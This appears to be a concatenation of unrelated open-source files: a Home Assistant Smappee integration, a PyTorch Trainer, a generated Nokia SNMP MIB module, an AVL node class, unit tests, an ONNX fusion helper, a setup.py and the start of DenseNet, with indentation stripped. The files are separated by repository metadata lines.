#
# The comport plugs have a tendency to ignore the on/off signal.
# And because you can't read the status of a plug, it's more
# reliable to execute the command twice.
try:
if is_remote_switch:
self._smappy.actuator_off(location_id, actuator_id, duration)
self._smappy.actuator_off(location_id, actuator_id, duration)
else:
self._localsmappy.off_command_control(actuator_id)
self._localsmappy.off_command_control(actuator_id)
except RequestException as error:
_LOGGER.error(
"Error turning actuator on. (%s)",
error)
return False
return True
def active_power(self):
"""Get sum of all instantaneous active power values from local hub."""
if not self.is_local_active:
return
try:
return self._localsmappy.active_power()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
def active_cosfi(self):
"""Get the average of all instantaneous cosfi values."""
if not self.is_local_active:
return
try:
return self._localsmappy.active_cosfi()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
def instantaneous_values(self):
"""ReportInstantaneousValues."""
if not self.is_local_active:
return
report_instantaneous_values = \
self._localsmappy.report_instantaneous_values()
report_result = \
report_instantaneous_values['report'].split('<BR>')
properties = {}
for lines in report_result:
lines_result = lines.split(',')
for prop in lines_result:
match = _SENSOR_REGEX.search(prop)
if match:
properties[match.group('key')] = \
match.group('value')
_LOGGER.debug(properties)
return properties
def active_current(self):
"""Get current active Amps."""
if not self.is_local_active:
return
properties = self.instantaneous_values()
return float(properties['current'])
def active_voltage(self):
"""Get current active Voltage."""
if not self.is_local_active:
return
properties = self.instantaneous_values()
return float(properties['voltage'])
def load_instantaneous(self):
"""LoadInstantaneous."""
if not self.is_local_active:
return
try:
return self._localsmappy.load_instantaneous()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
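# Illustrative sketch of how the wrapper above is typically queried (the credential
# variables and the location/actuator ids below are assumptions, not values from this file):
#
#   smappee = Smappee(client_id, client_secret, username, password, host, host_password)
#   smappee.update()                                  # throttled refresh of cached data
#   daily = smappee.get_consumption(location_id, aggregation=3, delta=1440)
#   smappee.actuator_on(location_id, actuator_id, is_remote_switch=True, duration=300)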
| 36.276353 | 78 | 0.581089 | [
"Apache-2.0"
] | Arshrock/home-assistant | homeassistant/components/smappee.py | 12,733 | Python |
import os
import math
from decimal import Decimal
import utility
import torch
import torch.nn.utils as utils
from tqdm import tqdm
class Trainer():
def __init__(self, args, loader, my_model, my_loss, ckp):
self.args = args
self.scale = args.scale
self.ckp = ckp
self.loader_train = loader.loader_train
self.loader_test = loader.loader_test
self.model = my_model
self.loss = my_loss
self.optimizer = utility.make_optimizer(args, self.model)
self.flag_ae_loss = True if args.loss.lower().find('ae') >= 0 else False
if self.args.precision == 'amp':
self.scaler = torch.cuda.amp.GradScaler()
if self.args.load != '':
# To avoid "UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`."
            # Stepping with zero gradients will not update any of the model parameters.
self.optimizer.zero_grad()
self.optimizer.step()
self.optimizer.load(ckp.dir, epoch=len(ckp.log))
self.error_last = 1e8
def train(self):
self.loss.step()
epoch = self.optimizer.get_last_epoch() + 1
lr = self.optimizer.get_lr()
self.ckp.write_log(
'[Epoch {}]\tLearning rate: {:.2e}'.format(epoch, Decimal(lr))
)
self.loss.start_log()
self.model.train()
timer_data, timer_model = utility.timer(), utility.timer()
# TEMP
self.loader_train.dataset.set_scale(0)
for batch, (lr, hr, _,) in enumerate(self.loader_train):
lr, hr = self.prepare(lr, hr)
if self.flag_ae_loss:
hr, hr_ae = hr[:,:self.args.n_colors, ...], hr[:,self.args.n_colors:,...]
else:
hr_ae = None
timer_data.hold()
timer_model.tic()
self.optimizer.zero_grad()
if self.args.precision == 'amp':
with torch.cuda.amp.autocast():
sr = self.model(lr, 0)
if self.flag_ae_loss:
sr_ae = self._forward_auto_encoder(hr_ae, 0)
else:
sr_ae = None
loss = self.loss(sr, hr, sr_ae, hr_ae)
self.scaler.scale(loss).backward()
else:
sr = self.model(lr, 0)
if self.flag_ae_loss:
sr_ae = self._forward_auto_encoder(hr_ae, 0)
else:
sr_ae = None
loss = self.loss(sr, hr, sr_ae, hr_ae)
loss.backward()
if self.args.gclip > 0:
utils.clip_grad_value_(
self.model.parameters(),
self.args.gclip
)
if self.args.precision == 'amp':
self.scaler.step(self.optimizer)
self.scaler.update()
else:
self.optimizer.step()
timer_model.hold()
if (batch + 1) % self.args.print_every == 0:
self.ckp.write_log('[{}/{}]\t{}\t{:.1f}+{:.1f}s'.format(
(batch + 1) * self.args.batch_size,
len(self.loader_train.dataset),
self.loss.display_loss(batch),
timer_model.release(),
timer_data.release()))
timer_data.tic()
self.loss.end_log(len(self.loader_train))
self.error_last = self.loss.log[-1, -1]
self.optimizer.schedule()
def test(self):
torch.set_grad_enabled(False)
epoch = self.optimizer.get_last_epoch()
self.ckp.write_log('\nEvaluation:')
self.ckp.add_log(
torch.zeros(1, len(self.loader_test), len(self.scale))
)
self.model.eval()
timer_test = utility.timer()
if self.args.save_results: self.ckp.begin_background()
for idx_data, d in enumerate(self.loader_test):
for idx_scale, scale in enumerate(self.scale):
d.dataset.set_scale(idx_scale)
for lr, hr, filename in tqdm(d, ncols=80):
lr, hr = self.prepare(lr, hr)
sr = self.model(lr, idx_scale)
sr = utility.quantize(sr, self.args.rgb_range)
save_list = [sr]
self.ckp.log[-1, idx_data, idx_scale] += utility.calc_psnr(
sr, hr, scale, self.args.rgb_range, dataset=d
)
if self.args.save_gt:
save_list.extend([lr, hr])
if self.args.save_results:
self.ckp.save_results(d, filename[0], save_list, scale)
self.ckp.log[-1, idx_data, idx_scale] /= len(d)
best = self.ckp.log.max(0)
self.ckp.write_log(
'[{} x{}]\tPSNR: {:.3f} (Best: {:.3f} @epoch {})'.format(
d.dataset.name,
scale,
self.ckp.log[-1, idx_data, idx_scale],
best[0][idx_data, idx_scale],
best[1][idx_data, idx_scale] + 1
)
)
self.ckp.write_log('Forward: {:.2f}s\n'.format(timer_test.toc()))
self.ckp.write_log('Saving...')
if self.args.save_results:
self.ckp.end_background()
if not self.args.test_only:
self.ckp.save(self, epoch, is_best=(best[1][0, 0] + 1 == epoch))
self.ckp.write_log(
'Total: {:.2f}s\n'.format(timer_test.toc()), refresh=True
)
torch.set_grad_enabled(True)
def prepare(self, *args):
device = torch.device('cpu' if self.args.cpu else 'cuda')
def _prepare(tensor):
if self.args.precision == 'half': tensor = tensor.half()
return tensor.to(device)
return [_prepare(a) for a in args]
def terminate(self):
if self.args.test_only:
self.test()
return True
else:
epoch = self.optimizer.get_last_epoch() + 1
return epoch > self.args.epochs
# return epoch >= self.args.epochs
def _forward_auto_encoder(self, x, idx_scale):
self.model.set_forward_ae_loss(True)
x = self.model(x, idx_scale)
self.model.set_forward_ae_loss(False)
return x | 34.645503 | 105 | 0.51069 | [
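# Illustrative driver loop for the Trainer above (a sketch; the args, loader, model,
# loss and checkpoint objects come from the rest of this codebase and are assumed here):
#
#   t = Trainer(args, loader, model, loss, checkpoint)
#   while not t.terminate():
#       t.train()
#       t.test()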
"MIT"
] | CvlabAssignment/WRcan | src/trainer.py | 6,548 | Python |
#
# PySNMP MIB module NOKIA-HWM-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-HWM-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:23:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint")
entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex")
ntcHWMibs, ntcHWReqs, ntcCommonModules = mibBuilder.importSymbols("NOKIA-COMMON-MIB-OID-REGISTRATION-MIB", "ntcHWMibs", "ntcHWReqs", "ntcCommonModules")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
ObjectIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, Integer32, IpAddress, TimeTicks, ModuleIdentity, MibIdentifier, Unsigned32, Counter32, NotificationType, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "Integer32", "IpAddress", "TimeTicks", "ModuleIdentity", "MibIdentifier", "Unsigned32", "Counter32", "NotificationType", "iso", "Bits")
AutonomousType, TextualConvention, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "AutonomousType", "TextualConvention", "TimeStamp", "DisplayString")
ntcHWModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 1, 16, 5, 1))
ntcHWModule.setRevisions(('1998-08-24 00:00', '1998-09-03 00:00', '1998-09-24 00:00', '1998-10-04 00:00', '1999-01-08 00:00', '1999-08-05 00:00', '1999-10-25 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ntcHWModule.setRevisionsDescriptions(('Rev 0.1 August 24, 1998 Initial version - ready for review', 'Rev 0.2 September 3, 1998 Initial review by Tero Soukko whose comments have been incorporated.', 'Rev 0.3 September 24, 1998 ready for initial review.', 'Rev 0.4 Updated anchors to use values registered by Mika Kiikkila.', 'Rev 1.0 Syntax of ntcHWLastChangedTime changed from DateAndTime to TimeStamp. Traps commented out because they are part of Nokia Common Alarm MIB.', 'Rev 1.01 Those IMPORTS which are not used are removed. Groups ntcHWSlots and ntcHWEventGroup which are not defined in this module are removed. The name NokiaHwmSlotEntry is changed to NtcHWSlotEntry on account of convenience. All notification definions before out-commented removed. Some esthetic modifications made.', "Comment 'The NMS is not allowed to set the value of ntcHWAdminstate to missing.' added to the ntcHWAdminstate's description.",))
if mibBuilder.loadTexts: ntcHWModule.setLastUpdated('9901080000Z')
if mibBuilder.loadTexts: ntcHWModule.setOrganization('Nokia')
if mibBuilder.loadTexts: ntcHWModule.setContactInfo('Anna-Kaisa Lindfors Nokia Telecommunications Oy Hiomotie 5, FIN-00380 Helsinki +358-9-51121 [email protected]')
if mibBuilder.loadTexts: ntcHWModule.setDescription('The MIB module that is used to control the Hardware Management information.')
ntcHWObjs = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1))
ntcHWEvents = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 2, 0))
ntcHWGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 1))
ntcHWCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 2))
ntcHWUnitTable = MibTable((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1), )
if mibBuilder.loadTexts: ntcHWUnitTable.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitTable.setDescription("A table which contains an entry for each pluggable circuit board (in this MIB a 'unit' is the same as a pluggable circuit board.) Entries of this table are automatically created by the hardware management software.")
ntcHWUnitEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: ntcHWUnitEntry.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitEntry.setDescription('A conceptual row in the ntcHWUnitTable. Rows are created automatically by the Hardware Management software.')
ntcHWAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("inService", 1), ("outOfService", 2), ("inTest", 3), ("missing", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWAdminState.setStatus('current')
if mibBuilder.loadTexts: ntcHWAdminState.setDescription('Represents the desired state of the unit. inService indicates that the unit is intended to be operating normally. outOfService indicates that the unit should be taken out of normal operating mode and no data traffic should appear in this unit. inTest indicates that the unit should be placed into a selftest mode. missing indicates that the unit is expected to be present but has been detected as not being physically present. The NMS is not allowed to set the value of ntcHWAdminstate to missing.')
ntcHWOperState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("down", 1), ("up", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWOperState.setStatus('current')
if mibBuilder.loadTexts: ntcHWOperState.setDescription('Indicates the current state of the unit. down indicates that the unit is in a non-functional state. up indicates that the unit is functioning normally.')
ntcHWAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("inCharge", 1), ("applicationStarting", 2), ("applicationShutdown", 3), ("platformStarting", 4), ("resetting", 5), ("separated", 6), ("unconfigured", 7), ("testing", 8), ("standby", 9), ("dormant", 10), ("unavailable", 11)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWAvailabilityStatus.setStatus('current')
if mibBuilder.loadTexts: ntcHWAvailabilityStatus.setDescription("Provides more specific information on the state of the unit in this conceptual row. The status column has eleven defined values: inCharge = the unit is fully operational and ready to perform its desired tasks; applicationStarting = the application software is starting up; applicationShutdown = the application software is shutting down; platformStarting = Basic platform software is starting up; resetting = the disk files are closed and hardware reset is forced; separated = Only basic OS software is running. The unit can start application software on request; unconfigured = The administrative state of the unit is 'missing', disk files are closed and only basic OS software is running. The unit refuses to start application software; testing = Selftests can be performed, only basic OS are running; standby = The unit is redundant and is fully operational but not in charge of operations. It is ready to move to 'inCharge' state when necessary; dormant = All connections are physically inactive to enable removal of the unit without electric disturbance in the backplane. Only watchdog software is running for a short duration of time; unavailable = The unit is not physically present or cannot be contacted.")
ntcHWRestart = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("reset", 1), ("hotRestart", 2), ("detach", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWRestart.setStatus('current')
if mibBuilder.loadTexts: ntcHWRestart.setDescription('Provides the ability to reset or perform a hot restart the unit represented by this conceptual row. reset = the Unit is shutdown in an orderly manner and restarted again via hardware reset; hotRestart = only the software in a unit is restarted, a hardware reset is not initiated; detach = all electrical connections of the unit are forced to an inactive state to enable removal of the unit without electrical disturbance in the backplane.')
ntcHWLedState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("red", 1), ("yellow", 2), ("black", 3), ("green", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWLedState.setStatus('current')
if mibBuilder.loadTexts: ntcHWLedState.setDescription('Indicates the current LED color of the unit represented by this conceptual row.')
ntcHWSerialNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWSerialNumber.setStatus('current')
if mibBuilder.loadTexts: ntcHWSerialNumber.setDescription('The units serial number in displayable format.')
ntcHWProductionDate = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWProductionDate.setStatus('current')
if mibBuilder.loadTexts: ntcHWProductionDate.setDescription('The units production date in displayable format.')
ntcHWUnitEntryChanged = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 8), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWUnitEntryChanged.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitEntryChanged.setDescription('Represents the value of sysUpTime at the instant that this conceptual row entry has changed.')
ntcHWSlotTable = MibTable((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2), )
if mibBuilder.loadTexts: ntcHWSlotTable.setStatus('current')
if mibBuilder.loadTexts: ntcHWSlotTable.setDescription('Table whose entries represent the expected circuit board type. The entries are created automatically by the hardware management software.')
ntcHWSlotEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: ntcHWSlotEntry.setStatus('current')
if mibBuilder.loadTexts: ntcHWSlotEntry.setDescription('The logical row describing the expected circiut board type of a slot.')
ntcHWDesiredUnitType = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2, 1, 2), AutonomousType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWDesiredUnitType.setStatus('current')
if mibBuilder.loadTexts: ntcHWDesiredUnitType.setDescription("The unit type which is expected to be inserted or present in the current slot. An indication of the vendor-specific hardware type of the HWM entity. Note that this is different from the definition of MIB-II's sysObjectID. An agent should set this object to a enterprise-specific registration identifier value indicating the specific equipment type in detail. If no vendor-specific registration identifier exists for this entity, or the value is unknown by this agent, then the value { 0 0 } is returned.")
ntcHWLastChangedTime = MibScalar((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 3), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWLastChangedTime.setStatus('current')
if mibBuilder.loadTexts: ntcHWLastChangedTime.setDescription('The value of sysUpTime at the time any of these events occur: * any instance in the following object changes value: - hwmUnitEntryChanged This object shall be set to value 0 in startup.')
ntcHWLoadInventoryContainer = MibScalar((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWLoadInventoryContainer.setStatus('current')
if mibBuilder.loadTexts: ntcHWLoadInventoryContainer.setDescription('Writing any value to this object will cause the hardware management software to reread its configuration file from disk.')
ntcHWUnits = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 1, 1)).setObjects(("NOKIA-HWM-MIB", "ntcHWAdminState"), ("NOKIA-HWM-MIB", "ntcHWOperState"), ("NOKIA-HWM-MIB", "ntcHWAvailabilityStatus"), ("NOKIA-HWM-MIB", "ntcHWRestart"), ("NOKIA-HWM-MIB", "ntcHWLedState"), ("NOKIA-HWM-MIB", "ntcHWSerialNumber"), ("NOKIA-HWM-MIB", "ntcHWProductionDate"), ("NOKIA-HWM-MIB", "ntcHWUnitEntryChanged"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ntcHWUnits = ntcHWUnits.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnits.setDescription('A collection of objects representing the status of a unit.')
ntcHWCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 2, 1)).setObjects(("ENTITY-MIB", "entityPhysicalGroup"), ("NOKIA-HWM-MIB", "ntcHWUnits"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ntcHWCompliance = ntcHWCompliance.setStatus('current')
if mibBuilder.loadTexts: ntcHWCompliance.setDescription('The compliance statement Hardware Management.')
mibBuilder.exportSymbols("NOKIA-HWM-MIB", ntcHWCompliance=ntcHWCompliance, ntcHWLedState=ntcHWLedState, ntcHWDesiredUnitType=ntcHWDesiredUnitType, ntcHWLastChangedTime=ntcHWLastChangedTime, ntcHWSlotEntry=ntcHWSlotEntry, ntcHWUnits=ntcHWUnits, ntcHWUnitEntry=ntcHWUnitEntry, ntcHWUnitEntryChanged=ntcHWUnitEntryChanged, ntcHWUnitTable=ntcHWUnitTable, ntcHWProductionDate=ntcHWProductionDate, ntcHWLoadInventoryContainer=ntcHWLoadInventoryContainer, ntcHWGroups=ntcHWGroups, ntcHWCompliances=ntcHWCompliances, ntcHWModule=ntcHWModule, ntcHWOperState=ntcHWOperState, ntcHWRestart=ntcHWRestart, ntcHWEvents=ntcHWEvents, ntcHWAvailabilityStatus=ntcHWAvailabilityStatus, ntcHWAdminState=ntcHWAdminState, ntcHWSlotTable=ntcHWSlotTable, ntcHWSerialNumber=ntcHWSerialNumber, ntcHWObjs=ntcHWObjs, PYSNMP_MODULE_ID=ntcHWModule)
| 168 | 1,280 | 0.772321 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp-with-texts/NOKIA-HWM-MIB.py | 14,112 | Python |
class NoNodeData(Exception):
pass
class AVLNode(object):
def __init__(self, key=None, value=None) -> None:
"""Initializes the AVL Node.
Args:
            key (optional): the key stored in the node. Defaults to None.
            value (optional): the value associated with the key. Defaults to None.
"""
super().__init__()
self.key = key
self.value = value
self.left = None
self.right = None
self.height = 1
def __str__(self) -> str:
"""Prints single AVL Node to stdout
Raises:
NoNodeData: If no data is present in the node
Returns:
str: output string
"""
if self.key:
out = "data: {0}\nleft: {1}\nright: {2}\n".format(
(self.key, self.value), self.left.__str__(), self.right.__str__())
return out
raise NoNodeData
def get_key(self) -> str:
"""returns the key of the node
Returns:
str: the key in (key, value) pair
"""
return self.key
def get_value(self) -> str:
"""returns the value of the key
Returns:
str: the value in (key, value) pair
"""
return self.value
| 23.56 | 82 | 0.516129 | [
"MIT"
] | gpk2000/avl-db | avltree/AVLNode.py | 1,178 | Python |
# -*- coding: utf-8 -*-
from benedict.core import clone as _clone
from benedict.core import traverse as _traverse
import unittest
class traverse_test_case(unittest.TestCase):
def test_traverse(self):
i = {
'a': {
'x': 2,
'y': 3,
'z': {
'ok': 5,
}
},
'b': {
'x': 7,
'y': 11,
'z': {
'ok': 13,
}
},
'c': {
'x': 17,
'y': 19,
'z': {
'ok': 23,
}
},
}
o = _clone(i)
with self.assertRaises(ValueError):
_traverse(o, True)
def f(parent, key, value):
if not isinstance(value, dict):
parent[key] = (value + 1)
_traverse(o, f)
r = {
'a': {
'x': 3,
'y': 4,
'z': {
'ok': 6,
}
},
'b': {
'x': 8,
'y': 12,
'z': {
'ok': 14,
}
},
'c': {
'x': 18,
'y': 20,
'z': {
'ok': 24,
}
},
}
self.assertEqual(o, r)
| 22 | 47 | 0.249311 | [
"MIT"
] | antran22/python-benedict | tests/core/test_traverse.py | 1,452 | Python |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
        # Avoid chaining consecutive Cast nodes.
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
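# Illustrative sketch of how these helpers are used during graph optimization
# (the OnnxModel instance and the input names are assumptions for illustration):
#
#   fusion_utils = FusionUtils(onnx_model)
#   casted, cast_output = fusion_utils.cast_graph_input_to_int32('input_ids')
#   fusion_utils.remove_cast_int32('segment_ids')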
| 41.741379 | 104 | 0.609252 | [
"Apache-2.0"
] | kiminh/fastformers | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | 2,421 | Python |
import pytest
import requests
from directory_constants import expertise, sectors
from django.shortcuts import Http404
from django.urls import reverse
from core import helpers
import core.tests.helpers
@pytest.mark.parametrize('status_code,exception', (
(400, requests.exceptions.HTTPError),
(404, Http404),
(500, requests.exceptions.HTTPError),
))
def test_handle_cms_response_error(status_code, exception):
response = core.tests.helpers.create_response(status_code=status_code)
with pytest.raises(exception):
helpers.handle_cms_response(response)
def test_handle_cms_response_ok():
response = core.tests.helpers.create_response(
status_code=200, json_payload={'field': 'value'}
)
assert helpers.handle_cms_response(response) == {'field': 'value'}
@pytest.mark.parametrize('path,expect_code', (
('/', None),
('?language=pt', 'pt'),
('/?language=ar', 'ar'),
('/industries?language=es', 'es'),
('/industries/?language=zh-hans', 'zh-hans'),
('/industries/aerospace?language=de', 'de'),
('/industries/automotive/?language=fr', 'fr'),
('?lang=fr', 'fr'),
('?language=de&lang=de', 'de'),
('?lang=pt&language=es', 'es')
))
def test_get_language_from_querystring(path, expect_code, rf):
url = reverse('index')
request = rf.get(url + path)
language_code = helpers.get_language_from_querystring(request)
assert language_code == expect_code
def test_company_parser_serialize_for_template(retrieve_profile_data):
company = helpers.CompanyParser(retrieve_profile_data)
assert company.serialize_for_template() == {
'address': '123 Fake Street, Fakeville, London, E14 6XK',
'address_line_1': '123 Fake Street',
'address_line_2': 'Fakeville',
'country': 'GB',
'date_of_creation': '02 March 2015',
'description': 'Ecommerce website',
'email_address': '[email protected]',
'email_full_name': 'Jeremy',
'employees': '501-1,000',
'expertise_countries': '',
'expertise_industries': '',
'expertise_languages': '',
'expertise_products_services': {},
'expertise_regions': '',
'facebook_url': 'http://www.facebook.com',
'has_expertise': False,
'keywords': 'word1, word2',
'linkedin_url': 'http://www.linkedin.com',
'locality': 'London',
'logo': 'nice.jpg',
'mobile_number': '07506043448',
'modified': '2016-11-23T11:21:10.977518Z',
'name': 'Great company',
'number': '01234567',
'po_box': 'abc',
'postal_code': 'E14 6XK',
'postal_full_name': 'Jeremy',
'sectors': 'Security',
'slug': 'great-company',
'summary': 'this is a short summary',
'supplier_case_studies': [],
'twitter_url': 'http://www.twitter.com',
'verified_with_code': True,
'website': 'http://example.com',
'company_type': 'COMPANIES_HOUSE',
'is_published_investment_support_directory': True,
'is_published_find_a_supplier': True,
'is_in_companies_house': True
}
def test_company_parser_serialize_for_template_empty():
company = helpers.CompanyParser({})
assert company.serialize_for_template() == {}
def test_get_results_from_search_response_xss(retrieve_profile_data):
response = core.tests.helpers.create_response(json_payload={
'hits': {
'total': 1,
'hits': [
{
'_source': retrieve_profile_data,
'highlight': {
'description': [
'<a onmouseover=javascript:func()>stuff</a>',
'to the max <em>wolf</em>.'
]
}
}
]
}
})
formatted = helpers.get_results_from_search_response(response)
assert formatted['results'][0]['highlight'] == (
'<a onmouseover=javascript:func()>stuff</a>...to the max '
'<em>wolf</em>.'
)
def test_get_filters_labels():
filters = {
'expertise_languages': ['aa'],
'q': 'foo',
'page': 5,
'expertise_regions': ['NORTH_EAST'],
'expertise_products_services_financial': [expertise.FINANCIAL[1]],
'industries': [sectors.AEROSPACE, sectors.ADVANCED_MANUFACTURING],
'expertise_products_services_human_resources': [
'Employment and talent research'
],
}
expected = [
'Afar',
'North East',
'Insurance',
'Aerospace',
'Advanced manufacturing',
'Employment and talent research',
]
assert helpers.get_filters_labels(filters) == expected
| 31.388158 | 78 | 0.607001 | [
"MIT"
] | uktrade/directory-ui-supplier | core/tests/test_helpers.py | 4,771 | Python |
from setuptools import setup
setup(
name='yt-dl',
version = "0.1.0",
author = "Fernando Luiz Cola",
author_email ="[email protected]",
license = "MIT",
install_requires=[
'Flask',
'youtube-dl',
],
)
| 21.571429 | 52 | 0.480132 | [
"Unlicense"
] | ferlzc/youtube-dl-flask | setup.py | 302 | Python |
import re
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from collections import OrderedDict
__all__ = ['DenseNet', 'densenet121', 'densenet169', 'densenet201', 'densenet161']
model_urls = {
'densenet121': 'https://download.pytorch.org/models/densenet121-a639ec97.pth',
'densenet169': 'https://download.pytorch.org/models/densenet169-b2777c0a.pth',
'densenet201': 'https://download.pytorch.org/models/densenet201-c1103571.pth',
'densenet161': 'https://download.pytorch.org/models/densenet161-8d451a50.pth',
}
def densenet121(pretrained=False, **kwargs):
r"""Densenet-121 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 24, 16),
**kwargs)
if pretrained:
        # '.'s are no longer allowed in module names, but previous _DenseLayer
